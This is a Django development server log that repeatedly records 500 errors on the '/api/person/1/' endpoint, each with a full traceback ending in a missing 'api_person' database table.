[03/Nov/2018 04:22:21] "GET /api/person/1/ HTTP/1.1" 500 20548
[03/Nov/2018 04:22:28] "GET / HTTP/1.1" 200 3358
Internal Server Error: /api/person/1/
Traceback (most recent call last):
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 85, in _execute
    return self.cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/sqlite3/base.py", line 296, in execute
    return Database.Cursor.execute(self, query, params)
sqlite3.OperationalError: no such table: api_person

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/handlers/base.py", line 126, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/handlers/base.py", line 124, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/views/decorators/csrf.py", line 54, in wrapped_view
    return view_func(*args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/viewsets.py", line 103, in view
    return self.dispatch(request, *args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/views.py", line 483, in dispatch
    response = self.handle_exception(exc)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/views.py", line 443, in handle_exception
    self.raise_uncaught_exception(exc)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/views.py", line 480, in dispatch
    response = handler(request, *args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/mixins.py", line 56, in retrieve
    instance = self.get_object()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/generics.py", line 98, in get_object
    obj = get_object_or_404(queryset, **filter_kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/generics.py", line 21, in get_object_or_404
    return _get_object_or_404(queryset, *filter_args, **filter_kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/shortcuts.py", line 93, in get_object_or_404
    return queryset.get(*args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 393, in get
    num = len(clone)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 250, in __len__
    self._fetch_all()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 1186, in _fetch_all
    self._result_cache = list(self._iterable_class(self))
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 54, in __iter__
    results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/sql/compiler.py", line 1065, in execute_sql
    cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 100, in execute
    return super().execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 68, in execute
    return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 77, in _execute_with_wrappers
    return executor(sql, params, many, context)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 85, in _execute
    return self.cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/utils.py", line 89, in __exit__
    raise dj_exc_value.with_traceback(traceback) from exc_value
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 85, in _execute
    return self.cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/sqlite3/base.py", line 296, in execute
    return Database.Cursor.execute(self, query, params)
django.db.utils.OperationalError: no such table: api_person
[03/Nov/2018 04:22:28] "GET /api/person/1/ HTTP/1.1" 500 20548
[03/Nov/2018 04:22:29] "GET / HTTP/1.1" 200 3358
Internal Server Error: /api/person/1/
Traceback (most recent call last):
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 85, in _execute
    return self.cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/sqlite3/base.py", line 296, in execute
    return Database.Cursor.execute(self, query, params)
sqlite3.OperationalError: no such table: api_person

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/handlers/base.py", line 126, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/handlers/base.py", line 124, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/views/decorators/csrf.py", line 54, in wrapped_view
    return view_func(*args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/viewsets.py", line 103, in view
    return self.dispatch(request, *args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/views.py", line 483, in dispatch
    response = self.handle_exception(exc)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/views.py", line 443, in handle_exception
    self.raise_uncaught_exception(exc)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/views.py", line 480, in dispatch
    response = handler(request, *args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/mixins.py", line 56, in retrieve
    instance = self.get_object()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/generics.py", line 98, in get_object
    obj = get_object_or_404(queryset, **filter_kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/generics.py", line 21, in get_object_or_404
    return _get_object_or_404(queryset, *filter_args, **filter_kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/shortcuts.py", line 93, in get_object_or_404
    return queryset.get(*args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 393, in get
    num = len(clone)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 250, in __len__
    self._fetch_all()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 1186, in _fetch_all
    self._result_cache = list(self._iterable_class(self))
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 54, in __iter__
    results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/sql/compiler.py", line 1065, in execute_sql
    cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 100, in execute
    return super().execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 68, in execute
    return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 77, in _execute_with_wrappers
    return executor(sql, params, many, context)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 85, in _execute
    return self.cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/utils.py", line 89, in __exit__
    raise dj_exc_value.with_traceback(traceback) from exc_value
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 85, in _execute
    return self.cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/sqlite3/base.py", line 296, in execute
    return Database.Cursor.execute(self, query, params)
django.db.utils.OperationalError: no such table: api_person
[03/Nov/2018 04:22:29] "GET /api/person/1/ HTTP/1.1" 500 20548
[03/Nov/2018 04:22:32] "GET / HTTP/1.1" 200 3358
Internal Server Error: /api/person/1/
Traceback (most recent call last):
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 85, in _execute
    return self.cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/sqlite3/base.py", line 296, in execute
    return Database.Cursor.execute(self, query, params)
sqlite3.OperationalError: no such table: api_person

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/handlers/base.py", line 126, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/handlers/base.py", line 124, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/views/decorators/csrf.py", line 54, in wrapped_view
    return view_func(*args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/viewsets.py", line 103, in view
    return self.dispatch(request, *args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/views.py", line 483, in dispatch
    response = self.handle_exception(exc)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/views.py", line 443, in handle_exception
    self.raise_uncaught_exception(exc)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/views.py", line 480, in dispatch
    response = handler(request, *args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/mixins.py", line 56, in retrieve
    instance = self.get_object()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/generics.py", line 98, in get_object
    obj = get_object_or_404(queryset, **filter_kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/generics.py", line 21, in get_object_or_404
    return _get_object_or_404(queryset, *filter_args, **filter_kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/shortcuts.py", line 93, in get_object_or_404
    return queryset.get(*args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 393, in get
    num = len(clone)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 250, in __len__
    self._fetch_all()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 1186, in _fetch_all
    self._result_cache = list(self._iterable_class(self))
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 54, in __iter__
    results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/sql/compiler.py", line 1065, in execute_sql
    cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 100, in execute
    return super().execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 68, in execute
    return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 77, in _execute_with_wrappers
    return executor(sql, params, many, context)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 85, in _execute
    return self.cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/utils.py", line 89, in __exit__
    raise dj_exc_value.with_traceback(traceback) from exc_value
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 85, in _execute
    return self.cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/sqlite3/base.py", line 296, in execute
    return Database.Cursor.execute(self, query, params)
django.db.utils.OperationalError: no such table: api_person
[03/Nov/2018 04:22:32] "GET /api/person/1/ HTTP/1.1" 500 20548
[03/Nov/2018 04:23:23] "GET / HTTP/1.1" 200 3358
Internal Server Error: /api/person/1/
Traceback (most recent call last):
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 85, in _execute
    return self.cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/sqlite3/base.py", line 296, in execute
    return Database.Cursor.execute(self, query, params)
sqlite3.OperationalError: no such table: api_person

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/handlers/base.py", line 126, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/handlers/base.py", line 124, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/views/decorators/csrf.py", line 54, in wrapped_view
    return view_func(*args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/viewsets.py", line 103, in view
    return self.dispatch(request, *args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/views.py", line 483, in dispatch
    response = self.handle_exception(exc)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/views.py", line 443, in handle_exception
    self.raise_uncaught_exception(exc)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/views.py", line 480, in dispatch
    response = handler(request, *args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/mixins.py", line 56, in retrieve
    instance = self.get_object()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/generics.py", line 98, in get_object
    obj = get_object_or_404(queryset, **filter_kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/generics.py", line 21, in get_object_or_404
    return _get_object_or_404(queryset, *filter_args, **filter_kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/shortcuts.py", line 93, in get_object_or_404
    return queryset.get(*args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 393, in get
    num = len(clone)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 250, in __len__
    self._fetch_all()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 1186, in _fetch_all
    self._result_cache = list(self._iterable_class(self))
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 54, in __iter__
    results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/sql/compiler.py", line 1065, in execute_sql
    cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 100, in execute
    return super().execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 68, in execute
    return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 77, in _execute_with_wrappers
    return executor(sql, params, many, context)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 85, in _execute
    return self.cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/utils.py", line 89, in __exit__
    raise dj_exc_value.with_traceback(traceback) from exc_value
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 85, in _execute
    return self.cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/sqlite3/base.py", line 296, in execute
    return Database.Cursor.execute(self, query, params)
django.db.utils.OperationalError: no such table: api_person
[03/Nov/2018 04:23:24] "GET /api/person/1/ HTTP/1.1" 500 20548
[03/Nov/2018 04:23:27] "GET / HTTP/1.1" 200 3358
